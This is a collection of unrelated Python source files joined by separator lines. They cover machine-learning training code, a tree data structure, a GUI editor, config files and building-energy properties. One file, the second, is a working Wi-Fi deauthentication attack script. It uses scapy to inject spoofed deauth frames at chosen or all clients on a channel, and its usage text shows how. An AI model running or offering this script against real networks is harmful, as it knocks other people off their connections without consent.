X_in = X_in[:,:,:]
X_in = X_in.reshape(X_in.shape[0],X_in.shape[1],X_in.shape[2],1)
X_ou = X_ou[:,:,:]
X_ou = X_ou.reshape(X_ou.shape[0],X_ou.shape[1],X_ou.shape[2],1)
X_train, X_test, y_train, y_test = train_test_split(X_in, X_ou, test_size=0.10, random_state=42)
#If training from scratch
if training_from_scratch:
generator_nn=unet()
#If training from pre-trained weights
else:
generator_nn=unet(pretrained_weights = weights_path+name_model+'.h5')
#Save best models to disk during training
checkpoint = ModelCheckpoint(weights_path+'/model_best.h5', verbose=1, monitor='val_loss',save_best_only=True, mode='auto')
generator_nn.summary()
#Training
history = generator_nn.fit(X_train, y_train, epochs=epochs, batch_size=batch_size, shuffle=True, callbacks=[checkpoint], verbose=1, validation_data=(X_test, y_test))
#Plot training and validation loss (log scale)
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(loss) + 1)
plt.plot(epochs, loss, label='Training loss')
plt.plot(epochs, val_loss, label='Validation loss')
plt.yscale('log')
plt.title('Training and validation loss')
plt.legend()
plt.show()
|
#!/usr/bin/python3
#
# Wi-Fi DeAuth attack
# by GramThanos
#
# Dependancies
# pip3 install scapy
# pip3 install mac-vendor-lookup
# Libraries
import os
import re
import sys
import getopt
import subprocess
import logging
from scapy.all import *
from mac_vendor_lookup import MacLookup
# Global Variables
VERBOSE = False
MACLOOKUP = None
INTERFACE_MONITOR = None
CHANNEL = None
SNIFF_MODE = 'SCAN'
ATTACK_ALL = False
access_points = []
victim_clients = []
# Instruct Scapy to use PCAP
#conf.use_pcap = True
''' Initialize Script
-----------------------------------'''
def initialize():
global MACLOOKUP
# Parse arguments
parse_script_arguments()
# Set up logging
logging.basicConfig(
level= logging.DEBUG if VERBOSE else logging.INFO,
format='[ATK]' + '[%(levelname)s] %(message)s'
)
# Check if root
if os.getuid() != 0:
logging.error('Run the script as root');
sys.exit(0)
# Init MAC lookup
MACLOOKUP = MacLookup()
MACLOOKUP.load_vendors()
# Parse parameters
def parse_script_arguments():
global VERBOSE, CHANNEL, SNIFF_MODE, ATTACK_ALL
try:
opts, args = getopt.getopt(sys.argv[1:], 'vhc:a:', ['verbose', 'help', 'channel=', 'attack='])
except getopt.GetoptError as err:
print(err)
show_script_usage()
sys.exit(2)
for o, a in opts:
# Print more info
if o == '-v' or o == '--verbose':
VERBOSE = True
# Print help message
elif o in ('-h', '--help'):
show_script_usage()
sys.exit()
# Set channel to scan/attack
elif o in ('-c', '--channel'):
CHANNEL = int(a)
if not (1 <= CHANNEL and CHANNEL <= 14):
CHANNEL = None
# MAC to attack
elif o in ('-a', '--attack'):
if a.lower() == '*':
ATTACK_ALL = True
elif validate_mac_address(a):
victim_clients.append(a)
SNIFF_MODE = 'ATTACK'
else:
assert False, "Invald MAC address to attack"
else:
assert False, "Unhandled option"
# Show help message
def show_script_usage():
print(
'Usage: sudo ./deauth.py [ARGUMENTS]...\n'
'\n'
'Optional arguments.\n'
' -v Run in verbose mode.\n'
' -h, --help Prints this message.\n'
' -c, --channel Channel to monitor.\n'
' -a, --attack Victim\'s MAC address.\n'
'\n'
'Example usage\n'
' Monitor channel 8 for victims:\n'
' sudo ./deauth.py -c 8\n'
' Attack all clients on channel 8:\n'
' sudo ./deauth.py -c 8 -a *\n'
' Attack clients by MAC on channel 8:\n'
' sudo ./deauth.py -c 8 -a AA:11:22:33:44:55 -a BB:11:22:33:44:55\n'
'\n'
'By GramThanos'
)
''' Help Functions
-----------------------------------'''
def throw_error(error):
if error:
logging.critical(error)
logging.critical('Failed!')
sys.exit(1)
def run_command(command):
if isinstance(command, str):
return subprocess.run(command, shell=True, check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
else:
return subprocess.run(command, check=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def run_command_assert(command, error):
logging.debug(command)
result = run_command(command)
if result.returncode != 0:
throw_error(error)
return result
def query_yes_no(question, default="yes"):
"""
https://stackoverflow.com/a/3041990/3709257
Ask a yes/no question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(question + prompt)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' (or 'y' or 'n').\n")
def query_number(question, num_from, num_to, default=-1):
if default < num_from and num_to < default:
raise ValueError("invalid default answer: '%s'" % str(default))
prompt = " [" + str(num_from) + "-" + str(num_to) + ":" + str(default) + "] "
while True:
sys.stdout.write(question + prompt)
choice = input()
if default is not None and choice == '':
return default
choice = int(choice)
if choice and choice >= num_from and choice <= num_to:
return choice
else:
sys.stdout.write("Please respond with a number from " + str(num_from) + "-" + str(num_to) + ".\n")
# Display MAC and Vendor
def mac_and_ventor(mac):
if mac is None:
return 'None [ - ]'
try:
vendor = MACLOOKUP.lookup(mac)
except KeyError as e:
vendor = 'Unknown'
return mac + ' [' + vendor + ']'
# Validate MAC address
def validate_mac_address(value):
if re.match(r"^([0-9A-Fa-f]{2}:){5}([0-9A-Fa-f]{2})$", value):
return True
return False
''' Interfaces Functions
-----------------------------------'''
# Get monitor interfaces
def get_monitor_interfaces():
# Get all wireless interfaces
result = run_command_assert('iwconfig', 'Failed to get wireless interfaces!')
# Parse interfaces
result = re.sub(r"\n\s+\n", "\n\n", result.stdout.decode('utf-8'))
data = re.findall(r"(([a-zA-Z0-9]+)\s+(?:.+\n)+)", result)
# For each result
interfaces = []
for interface in data:
if re.search(r"\s+Mode:Monitor\s+", interface[0]) :
interfaces.append(interface[1])
# Return interfaces
return interfaces
# Select monitor interface
def select_monitor_interface():
# Get all monitor interfaces
interfaces = get_monitor_interfaces()
# Not monitor interface
if (len(interfaces) == 0) :
throw_error('No interface found in monitor mode!');
# More than one
if (len(interfaces) > 1) :
logging.info('Selecting the first interface in monitor mode')
logging.info('Interface "%s" selected' % interfaces[0])
return interfaces[0]
# Set monitor channel
def set_monitor_channel(interface, channel):
# Change channel
result = run_command('iwconfig %s channel %d' % (interface, channel))
if result.returncode != 0:
logging.error('Failed to set channel %d on interface "%s"' % (channel, interface))
# Ask to try again
if query_yes_no('Do you want to reset the interface "%s"?' % interface, 'yes'):
# Reset interface
run_command_assert(
'ifconfig %s down && ifconfig %s up' % (interface, interface),
'Failed to reset interface "%s"' % interface
)
# Try again
run_command_assert(
'iwconfig %s channel %d' % (interface, channel),
'Failed to set channel %d on interface "%s"' % (channel, interface)
)
else:
throw_error('Cancel')
logging.info('Channel was set to %d' % channel)
''' Packet Functions
-----------------------------------'''
# Scan mode - List Devices using the channel
def sniffer_handler_scan(packet):
# Get layer info
layer = packet.getlayer(Dot11)
# Record any beacon access point
if packet.haslayer(Dot11Beacon) and layer.addr2 not in access_points:
access_points.append(layer.addr2)
logging.info('Detected AP : "%s" - %s' % (packet.getlayer(Dot11Elt).info.decode('UTF-8'), mac_and_ventor(layer.addr2)))
# Filter packages from the victim to the access point
elif layer.addr2 is not None and layer.addr2 not in victim_clients and layer.addr1 in access_points:
victim_clients.append(layer.addr2)
logging.info('Detected victim : %s' % (mac_and_ventor(layer.addr2)))
# Attack mode - Send DeAuth packets to victim devices
ATTACK_COUNTER = 0
def sniffer_handler_attack(packet):
global ATTACK_COUNTER
# Get layer info
layer = packet.getlayer(Dot11)
# Record any beacon access point
if packet.haslayer(Dot11Beacon) and layer.addr2 not in access_points:
access_points.append(layer.addr2)
logging.info('Detected AP : "%s" - %s' % (packet.getlayer(Dot11Elt).info.decode('UTF-8'), mac_and_ventor(layer.addr2)))
# Filter packages from the victim to the access point
elif ((ATTACK_ALL == True and layer.addr2 is not None) or layer.addr2 in victim_clients) and layer.addr1 in access_points:
ATTACK_COUNTER = ATTACK_COUNTER + 1
logging.info('Deauth : [%d] %s' % (ATTACK_COUNTER, mac_and_ventor(layer.addr2)))
inject = RadioTap()/Dot11(addr1=layer.addr2,addr2=layer.addr1,addr3=layer.addr1)/Dot11Deauth(reason=7)
sendp(inject, iface=INTERFACE_MONITOR, count=10, verbose=False)
''' Execution
-----------------------------------'''
if __name__ == "__main__":
# Initialize script
initialize()
# Get an interface
INTERFACE_MONITOR = select_monitor_interface()
# Set channel
if CHANNEL is None:
CHANNEL = query_number('Select channel to monitor', 1, 14, default=1)
set_monitor_channel(INTERFACE_MONITOR, CHANNEL)
# Start monitoring
handler = \
sniffer_handler_attack if SNIFF_MODE == 'ATTACK' else\
sniffer_handler_scan
sniff(iface=INTERFACE_MONITOR, prn=handler)
|
from .potongan_absen_karyawan import MxPotonganAbsenKaryawan
from .rekap_absen_karyawan import MxRekapAbsenKaryawan
from .rekap_gaji_departemen import MxRekapGajiDepartemen
from .rekap_lembur_karyawan import MxRekapLemburKaryawan
from .slip_gaji_karyawan import MxSlipGajiKaryawan
from .upah_lembur_karyawan import MxUpahLemburKaryawan
|
def teardown_function(function):
raise Exception('teardown failed')
def test():
pass
|
"""Module Implements General Trees using linked lists
Author: Rajan Subramanian
Date: -
"""
from __future__ import annotations
from typing import Any, Iterator, List, Union
from marketlearn.algorithms.trees import tree_base as tb
class GeneralTree(tb._GeneralTreeBase):
"""Class representing general tree structure using linked representation"""
class _Node:
__slots__ = "_element", "_parent", "_children", "_total_children"
def __init__(self, element: Any, parent=None, children=[]):
self._element = element
self._parent = parent
self._children = children
self._total_children = len(children) if children else 0
def __len__(self):
"""returns total numbner of children in the node
Returns
-------
int
count of number of children in this node
"""
return self._total_children
def __repr__(self):
return "Node({!r})".format(self._element)
class Position(tb.Position):
"""Abstraction representing location of single element"""
def __init__(self, container, node):
self._container = container
self._node = node
def element(self):
"""return element stored at position"""
return self._node._element
def __eq__(self, other: object):
if not isinstance(other, Position):
return NotImplemented
return type(other) is type(self) and other._node is self._node
def _make_position(self, node: _Node) -> Union[Position, None]:
"""Return Position's instance for a given node"""
return self.Position(self, node) if node is not None else None
def _validate(self, p: Position) -> _Node:
"""return position's node or raise appropriate error if invalid
Parameters
----------
p : Position
represents the position of interest
Returns
-------
_Node
position's node object
Raises
------
TypeError
if p is not a proper Position
TypeError
if p does not belong to same container
ValueError
if p's parent is the current node
"""
if not isinstance(p, self.Position):
raise TypeError("p must be proper Position type")
if p._container is not self:
raise TypeError("p does not belong to this container")
# convention for deprecated nodes
if p._node._parent is p._node:
raise ValueError("p is no longer valid")
return p._node
# general tree constructor
def __init__(self):
"""Creates a initially empty general tree"""
self._root = None
self._size = 0
def __len__(self):
"""returns total number of nodes in a tree"""
return self._size
def root(self) -> Position:
"""return root position of tree, return None if tree is empty"""
return self._make_position(self._root)
def parent(self, p: Position) -> Union[Position, None]:
"""return position representing p's parent (or None if p is root)
Parameters
----------
p : Position
position who's parent we are interested in
Returns
-------
Union[Position, None]
position representing p's parent or None if p is root
"""
node = self._validate(p)
return self._make_position(node._parent)
def num_children(self, p: Position) -> int:
"""returns count of total children of position p
Parameters
----------
p : Position
represents the parent position
Returns
-------
int
count of total children of p
"""
node = self._validate(p)
return len(node)
def children(self, p: Position) -> Iterator[Position]:
"""generates iteration of p's children
Parameters
----------
p : Position
[description]
Yields
-------
Iterator[Position]
[description]
"""
node = self._validate(p)
for child in node._children:
yield self._make_position(child)
def _add_root(self, data: Any) -> Position:
"""Adds root position to a tree
Parameters
----------
data : Any
[description]
Returns
-------
Position
[description]
Raises
------
ValueError
[description]
"""
if self._root:
raise ValueError("Root Exists")
self._size = 1
self._root = self._Node(data)
return self._make_position(self._root)
def _add_children(
self, p: Position, children: List[Any]
) -> List[Position]:
"""Add children data into p's position
Parameters
----------
p : Position
[description]
children : List[Any]
[description]
Returns
-------
List[Position]
list of positions representing p's children
Raises
------
ValueError
if children data already exists
"""
node = self._validate(p)
if node._children is not None:
raise ValueError("children already exist")
node_children = [None] * len(children)
for idx, child in enumerate(children):
child_node = self._Node(child, parent=node)
node_children[idx] = child_node
self._size += 1
# assign children to this node
node._children = node_children
return [self._make_position(n) for n in node._children]
def positions(self, traversal: str = "preorder") -> Iterator[Position]:
"""Generates iterations of tree's positions
Parameters
----------
traversal : str, optional, default='inorder'
one of preorder, postorder, breadthfirst
Yields
-------
Iterator[Position]
[description]
"""
return getattr(self, traversal)()
|
import os
import sys
import random
import numpy as np
import pandas as pd
# Please modify to fit your environment
import tensorflow as tf
import tensorflow.contrib.keras.api.keras as keras
from tensorflow.contrib.keras.api.keras import backend, callbacks
from tensorflow.contrib.keras.api.keras.models import Model
from tensorflow.contrib.keras.api.keras.layers import Input
from tensorflow.contrib.keras.api.keras.utils import Progbar
from tensorflow.contrib.keras.api.keras.optimizers import Adam
from functools import partial
from sklearn.neighbors import NearestNeighbors
from sklearn.model_selection import KFold
import matplotlib.pyplot as plt
import macro as mc
import load_data as ld
import preprocess as pre
import models
import compute_relation_vectors as rv
if len(sys.argv) != 2:
print("input error: main.py method_flag")
print("method flag : nontransfer (=0), standard transfer learning (=1), count ver. all transfer deep learning (=2),\
mean ver. all transfer deep learning (=3), mean modified ver. all transfer deep learning (=4)")
sys.exit(1)
_, method_flag = sys.argv
def Neighbors( labels, database, knum ):
nbrs = NearestNeighbors(n_neighbors=knum, algorithm='ball_tree').fit(database)
dis, idx = nbrs.kneighbors(labels)
return dis, idx
def main(method_flag):
# load data
source_df, target_df = ld.load_file()
predicts, corrects = [], []
random.seed(123)
np.random.seed(123)
kf = KFold(shuffle=False,random_state=1,n_splits=mc._FOLD_NUM)
fold_num = 1
cnt = 0
for train, test in kf.split(target_df):
print('{0}/{1}'.format(fold_num, mc._FOLD_NUM))
target_train = target_df.iloc[train]
target_test = target_df.iloc[test]
idx, labels = transfer_model(source_df, target_train, target_test, method_flag, fold_num)
predicts.extend(idx.tolist())
corrects.extend(labels[0].tolist())
fold_num = fold_num+1
# save results
predicts = np.array(predicts)
corrects = np.array(corrects)
err = []
for i in range(len(predicts)):
if predicts[i] == corrects[i]:
err.append(0)
else:
err.append(1)
test = np.concatenate((np.reshape(predicts,[len(predicts),1]),np.reshape(corrects,[len(corrects),1]),\
np.reshape(err,[len(err),1])), axis=1)
save_data = pd.DataFrame(test)
save_data.to_csv('%s'%(mc._RESULT_FILE),index=False,header=False)
#save_data.to_csv('../results/results.csv',index=False,header=False)
fp = open('%s'%(mc._RESULT_FILE),'a')
#fp = open('../results/results.csv','a')
fp.write('%f\n'%((1.0-np.mean(err))*100.0))
fp.close()
def transfer_model(source_df, target_df, test_df, method_flag, fold_num):
source_labels, source_data = np.split(np.array(source_df),[1],axis=1)
target_labels, target_data = np.split(np.array(target_df),[1],axis=1)
test_labels, test_data = np.split(np.array(test_df),[1],axis=1)
# normalization
#normalized_source_data = pre.normalize(source_data)
#normalized_target_data = pre.normalize(target_data)
#normalized_test_data = pre.normalize(test_data)
normalized_source_data = source_data
normalized_target_data = target_data
normalized_test_data = test_data
### constuct model for source domain task ###
# optimization
opt = Adam()
# network setting
latent = models.latent(normalized_source_data.shape[1])
sll = models.source_last_layer()
tll = models.target_last_layer()
source_inputs = Input(shape=normalized_source_data.shape[1:])
latent_features = latent(source_inputs)
source_predictors = sll(latent_features)
latent.trainable = mc._SORUCE_LATENT_TRAIN
source_predictors.trainable = True
source_nn = Model(inputs=[source_inputs], outputs=[source_predictors])
source_nn.compile(loss=['mean_squared_error'],optimizer=opt)
#source_nn.summary()
# training using source domain data
if method_flag != mc._SCRATCH:
source_max_loop = int(normalized_source_data.shape[0]/mc._BATCH_SIZE)
source_progbar = Progbar(target=mc._SOURCE_EPOCH_NUM)
for epoch in range(mc._SOURCE_EPOCH_NUM):
shuffle_data, shuffle_labels, _ = pre.paired_shuffle(normalized_source_data,source_labels,1)
for loop in range(source_max_loop):
batch_train_data = shuffle_data[loop*mc._BATCH_SIZE:(loop+1)*mc._BATCH_SIZE]
batch_train_labels = shuffle_labels[loop*mc._BATCH_SIZE:(loop+1)*mc._BATCH_SIZE]
batch_train_labels = np.reshape(batch_train_labels, [len(batch_train_labels)])
one_hots = np.identity(mc._SOURCE_DIM_NUM)[np.array(batch_train_labels, dtype=np.int32)]
loss = source_nn.train_on_batch([batch_train_data],[one_hots])
#source_progbar.add(1, values=[("source loss",loss)])
# save
#latent.save('../results/source_latent.h5')
#sll.save('../results/source_last_layer.h5')
# compute relation vectors
if method_flag == mc._SCRATCH or method_flag == mc._CONV_TRANSFER:
target_vectors = np.identity(mc._TARGET_DIM_NUM)[np.array(target_labels, dtype=np.int32)]
target_vectors = np.reshape(target_vectors, [target_vectors.shape[0], target_vectors.shape[2]])
elif method_flag == mc._COUNT_ATDL:
target_labels, relations = rv.compute_relation_labels(source_nn, normalized_target_data, target_labels, fold_num)
target_vectors = np.identity(mc._SOURCE_DIM_NUM)[np.array(target_labels, dtype=np.int32)]
target_vectors = np.reshape(target_vectors, [target_vectors.shape[0], target_vectors.shape[2]])
else:
relation_vectors = rv.compute_relation_vectors(source_nn, normalized_target_data, target_labels, fold_num, method_flag)
target_vectors = np.zeros((len(target_labels),mc._SOURCE_DIM_NUM), dtype=np.float32)
for i in range(len(target_labels)):
target_vectors[i] = relation_vectors[int(target_labels[i])]
### tuning model for target domain task ###
latent.trainable = mc._TARGET_LATENT_TRAIN
target_inputs = Input(shape=normalized_target_data.shape[1:])
latent_features = latent(target_inputs)
if method_flag == mc._SCRATCH or method_flag == mc._CONV_TRANSFER:
predictors = tll(latent_features)
label_num = mc._TARGET_DIM_NUM
else:
predictors= sll(latent_features)
label_num = mc._SOURCE_DIM_NUM
target_nn = Model(inputs=[target_inputs], outputs=[predictors])
target_nn.compile(loss=['mean_squared_error'],optimizer=opt)
#target_nn.summary()
# training using target domain data
target_max_loop = int(normalized_target_data.shape[0]/mc._BATCH_SIZE)
target_progbar = Progbar(target=mc._TARGET_EPOCH_NUM)
for epoch in range(mc._TARGET_EPOCH_NUM):
shuffle_data, shuffle_labels, _ = \
pre.paired_shuffle(normalized_target_data, target_vectors, label_num)
for loop in range(target_max_loop):
batch_train_data = shuffle_data[loop*mc._BATCH_SIZE:(loop+1)*mc._BATCH_SIZE]
batch_train_labels = shuffle_labels[loop*mc._BATCH_SIZE:(loop+1)*mc._BATCH_SIZE]
loss = target_nn.train_on_batch([batch_train_data],[batch_train_labels])
#target_progbar.add(1, values=[("target loss",loss)])
# compute outputs of test data of target domain
x = target_nn.predict([normalized_test_data])
if method_flag == mc._SCRATCH or method_flag == mc._CONV_TRANSFER:
idx = np.argmax(x, axis=1)
elif method_flag == mc._COUNT_ATDL:
idx = np.argmax(x,axis=1)
for j in range(len(test_labels)):
for i in range(mc._TARGET_DIM_NUM):
if test_labels[j] == i:
test_labels[j] = relations[i]
break
else:
distance, idx = Neighbors(x, relation_vectors, 1)
idx = idx[:,0]
backend.clear_session()
return idx.T, test_labels.T
if __name__ == '__main__':
method_flag = int(method_flag)
main(method_flag)
|
'''
@Author: Gordon Lee
@Date: 2019-08-12 21:53:17
@LastEditors: Gordon Lee
@LastEditTime: 2019-08-13 17:58:30
@Description:
'''
class Config(object):
'''
全局配置参数
'''
status = 'train' # 执行 train_eval or test, 默认执行train_eval
use_model = 'TextCNN' # 使用何种模型, 默认使用TextCNN
output_folder = 'output_data/' # 已处理的数据所在文件夹
data_name = 'SST-1' # SST-1(fine-grained) SST-2(binary)
SST_path = 'data/stanfordSentimentTreebank/' # 数据集所在路径
emb_file = 'data/glove.6B.300d.txt' # 预训练词向量所在路径
emb_format = 'glove' # embedding format: word2vec/glove
min_word_freq = 1 # 最小词频
max_len = 40 # 采样最大长度
|
import json
from dataclasses import dataclass
from typing import List, NamedTuple
import pytorch_lightning as pl
import torch
from sentencepiece import SentencePieceProcessor
from torch.nn.functional import pad
from torch.utils.data import DataLoader
from src.config import ConveRTTrainConfig
config = ConveRTTrainConfig()
# Todo implement BPE from scratch with unk tokens hashed (although may achieve worse results on downstream tasks) as
# perhaps not as general as bpemb's 25000.model
@dataclass
class EncoderInputFeature:
input_ids: torch.Tensor
attention_mask: torch.Tensor
position_ids: torch.Tensor
input_lengths: torch.Tensor
def pad_sequence(self, seq_len: int):
self.input_ids = pad(
self.input_ids, [0, seq_len - self.input_ids.size(0)], "constant", 0
)
self.attention_mask = pad(
self.attention_mask,
[0, seq_len - self.attention_mask.size(0)],
"constant",
0,
)
self.position_ids = pad(
self.position_ids, [0, seq_len - self.position_ids.size(0)], "constant", 0
)
@dataclass
class EmbeddingPair:
context: EncoderInputFeature
reply: EncoderInputFeature
class DataModule(pl.LightningDataModule):
# using pytorch lightning, as will save a lot of time downstream, when using multi-gpu, distributed method
# and for managing 16 precision.
def __init__(self):
super().__init__()
self.input_attributes = [
"input_ids",
"attention_mask",
"position_ids",
"input_lengths",
]
def batching_input_features(
self, encoder_inputs: List[EncoderInputFeature]
) -> EncoderInputFeature:
max_seq_len = max(
[
int(encoder_input.input_lengths.item())
for encoder_input in encoder_inputs
]
)
for encoder_input in encoder_inputs:
encoder_input.pad_sequence(max_seq_len)
batch_features = {
feature_name: torch.stack(
[
getattr(encoder_input, feature_name)
for encoder_input in encoder_inputs
],
dim = 0,
)
for feature_name in self.input_attributes
}
return EncoderInputFeature(**batch_features)
def convert_collate_fn(self, features: List[EmbeddingPair]) -> EmbeddingPair:
return EmbeddingPair(
context = self.batching_input_features(
[feature.context for feature in features]
),
reply = self.batching_input_features([feature.reply for feature in features]),
)
def train_dataloader(self, train_dataset):
return DataLoader(
train_dataset,
config.train_batch_size,
collate_fn = self.convert_collate_fn,
drop_last = True, # drop last incomplete batch
#num_workers = 8
)
def val_dataloader(self):
# Todo
pass
# return DataLoader()
def test_dataloader(self):
# Todo
pass
# return DataLoader()
class DatasetInstance(NamedTuple):
context: List[str]
response: str
def load_instances_from_reddit_json(dataset_path: str) -> List[DatasetInstance]:
instances: List[DatasetInstance] = []
with open(dataset_path) as f:
for line in f:
x = json.loads(line)
context_keys = sorted([key for key in x.keys() if "context" in key])
instance = DatasetInstance(
context = [x[key] for key in context_keys], response = x["response"],
)
instances.append(instance)
return instances
class RedditData(torch.utils.data.Dataset):
def __init__(
self,
instances: List[DatasetInstance],
sp_processor: SentencePieceProcessor,
truncation_length: int,
):
self.sp_processor = sp_processor
self.instances = instances
self.truncation_length = truncation_length
def __len__(self):
return len(self.instances)
def __getitem__(self, item):
context_str = self.instances[item].context[0]
context_embedding = self._convert_instance_to_embedding(context_str)
reply_embedding = self._convert_instance_to_embedding(
self.instances[item].response
)
return EmbeddingPair(context = context_embedding, reply = reply_embedding)
def _convert_instance_to_embedding(self, input_str: str) -> EncoderInputFeature:
input_ids = self.sp_processor.EncodeAsIds(input_str)
if self.truncation_length:
input_ids = input_ids[: self.truncation_length]
attention_mask = [1 for _ in range(len(input_ids))] # [1]*len(input_ids)
position_ids = [i for i in range(len(input_ids))] # list(range(len(input_ids))
return EncoderInputFeature(
input_ids = torch.tensor(input_ids).to(config.device),
attention_mask = torch.tensor(attention_mask).to(config.device),
position_ids = torch.tensor(position_ids).to(config.device),
input_lengths = torch.tensor(len(input_ids)).to(config.device),
)
|
#Desafio:Faça um programa em Python que abra e reproduza um arquivo de mp3.
#import pygame
#pygame.mixer.init()
#pygame.mixer.music.load('Ex021.mp3')
#pygame.mixer.music.play()
#while(pygame.mixer.music.get_busy()): pass
import playsound
playsound.playsound('Ex021.mp3')
|
from __future__ import print_function
import lemon
class MyWorkflow(lemon.Workflow):
def __init__(self):
import lemon
lemon.Workflow.__init__(self)
self.rnc = {}
def worker(self, entry, pdbid):
import lemon
self.rnc = lemon.count_residues(entry, self.rnc)
return ""
def finalize(self):
for rn in self.rnc:
print(str(rn) + '\t' + str(self.rnc[rn]))
wf = MyWorkflow()
lemon.launch(wf, LEMON_HADOOP_DIR, LEMON_NUM_THREADS)
|
import json
import os
from collections import OrderedDict
import wx
from core.src.frame_classes.design_frame import MyDialogKetValueSetting
class NamesEditFrame(MyDialogKetValueSetting):
def __init__(self, parent, names, path):
super(NamesEditFrame, self).__init__(parent)
self.names = names
self.edit_group = OrderedDict(self.names)
self.key_group = list(self.edit_group.keys())
self.show_list = []
self.path = path
self.is_changed = False
@staticmethod
def string_format(key, value):
return f'"{key}"->"{value}"'
def get_names(self):
return self.names
def clear_data(self):
self.m_textCtrl_new_value.Clear()
self.m_textCtrl_new_key.Clear()
def editor_init(self, event):
for key, item in self.edit_group.items():
self.show_list.append(f'"{key}"->"{item}"')
self.m_listBox_name_exist.Clear()
self.m_listBox_name_exist.Set(self.show_list)
def view_item(self, event):
index = event.GetSelection()
key = self.key_group[index]
value = self.edit_group.get(key)
wx.MessageBox(f"'{key}'->'{value}'", "信息")
def edit_exist_item(self, event):
index = event.GetSelection()
key = self.key_group[index]
value = self.edit_group.get(key)
self.m_textCtrl_new_key.SetValue(key)
self.m_textCtrl_new_value.SetValue(value)
def add_item(self, event):
key = self.m_textCtrl_new_key.GetValue()
value = self.m_textCtrl_new_value.GetValue()
if key == "" or value == "":
wx.MessageBox("键或值不能为空白!", "错误", wx.ICON_ERROR)
else:
if key in self.key_group:
index = self.key_group.index(key)
feedback = wx.MessageBox(f"【{key}】已经存在键组中,点击【确认】将会使用新值覆盖", "信息", wx.YES_NO | wx.ICON_INFORMATION)
if feedback == wx.YES:
self.edit_group[key] = value
self.m_listBox_name_exist.SetString(index, f'"{key}"->"{value}"')
self.is_changed = True
else:
self.key_group.append(key)
self.edit_group[key] = value
self.is_changed = True
self.m_listBox_name_exist.Append(f'"{key}"->"{value}"')
self.clear_data()
def clear_item(self, event):
self.clear_data()
def import_names(self, event):
overwrite = 0
new_item = 0
dialog = wx.FileDialog(self, "加载键值对文件(json)", os.path.join(self.path, "core\\assets"), "names.json", "*json",
wx.FD_FILE_MUST_EXIST | wx.FD_OPEN)
is_ok = dialog.ShowModal()
if is_ok:
try:
with open(dialog.GetPath(), "r")as file:
temple = json.load(file)
for key, item in temple.items():
if not isinstance(item, str):
raise TypeError("不可用文件")
self.edit_group[key] = item
if key in self.key_group:
overwrite += 1
index = self.key_group.index(key)
self.m_listBox_name_exist.SetString(index, self.string_format(key, item))
else:
new_item += 1
self.m_listBox_name_exist.Append(self.string_format(key, item))
wx.MessageBox(f"导入键值对文件成功!\n\t覆盖:{overwrite}\n\t新增:{new_item}", "信息")
self.is_changed=True
except Exception as info:
wx.MessageBox(f"导入键值对文件出现错误!\n{info.__str__()}")
def close_save(self, event):
if self.is_changed:
feedback = wx.MessageBox("要应用这些变化吗?", "信息", wx.ICON_INFORMATION | wx.YES_NO)
if feedback == wx.YES:
save_data={k.lower():v for k,v in self.edit_group.items()}
with open(os.path.join(self.path, "core\\assets\\names.json"), "w")as file:
json.dump(save_data, file, indent=4)
self.names = dict(self.edit_group)
super(NamesEditFrame, self).close_save(event)
|
"""
Classes of building properties
"""
import numpy as np
import pandas as pd
from geopandas import GeoDataFrame as Gdf
from datetime import datetime
from collections import namedtuple
from cea.demand import constants
import cea.config
from cea.utilities.dbf import dbf_to_dataframe
from cea.technologies import blinds
from typing import List
__author__ = "Gabriel Happle"
__copyright__ = "Copyright 2017, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Gabriel Happle", "Jimeno A. Fonseca", "Daren Thomas", "Jack Hawthorne", "Reynold Mok"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "cea@arch.ethz.ch"
__status__ = "Production"
# import constants
H_F = constants.H_F
RSE = constants.RSE
H_MS = constants.H_MS
H_IS = constants.H_IS
B_F = constants.B_F
LAMBDA_AT = constants.LAMBDA_AT
class BuildingProperties(object):
"""
Groups building properties used for the calc-thermal-loads functions. Stores the full DataFrame for each of the
building properties and provides methods for indexing them by name.
G. Happle BuildingPropsThermalLoads 27.05.2016
"""
def __init__(self, locator, building_names=None):
"""
Read building properties from input shape files and construct a new BuildingProperties object.
:param locator: an InputLocator for locating the input files
:type locator: cea.inputlocator.InputLocator
:param List[str] building_names: list of buildings to read properties
:returns: BuildingProperties
:rtype: BuildingProperties
"""
if building_names is None:
building_names = locator.get_zone_building_names()
self.building_names = building_names
print("read input files")
prop_geometry = Gdf.from_file(locator.get_zone_geometry())
prop_geometry['footprint'] = prop_geometry.area
prop_geometry['perimeter'] = prop_geometry.length
prop_geometry['Blength'], prop_geometry['Bwidth'] = self.calc_bounding_box_geom(locator.get_zone_geometry())
prop_geometry = prop_geometry.drop('geometry', axis=1).set_index('Name')
prop_hvac = dbf_to_dataframe(locator.get_building_air_conditioning())
prop_typology = dbf_to_dataframe(locator.get_building_typology()).set_index('Name')
# Drop 'REFERENCE' column if it exists
if 'REFERENCE' in prop_typology:
prop_typology.drop('REFERENCE', 1, inplace=True)
prop_architectures = dbf_to_dataframe(locator.get_building_architecture())
prop_comfort = dbf_to_dataframe(locator.get_building_comfort()).set_index('Name')
prop_internal_loads = dbf_to_dataframe(locator.get_building_internal()).set_index('Name')
prop_supply_systems_building = dbf_to_dataframe(locator.get_building_supply())
# GET SYSTEMS EFFICIENCIES
prop_supply_systems = get_properties_supply_sytems(locator, prop_supply_systems_building).set_index(
'Name')
# get temperatures of operation
prop_HVAC_result = get_properties_technical_systems(locator, prop_hvac).set_index('Name')
# get envelope properties
prop_envelope = get_envelope_properties(locator, prop_architectures).set_index('Name')
# get properties of rc demand model
prop_rc_model = self.calc_prop_rc_model(locator, prop_typology, prop_envelope,
prop_geometry, prop_HVAC_result)
# get solar properties
solar = get_prop_solar(locator, building_names, prop_rc_model, prop_envelope).set_index('Name')
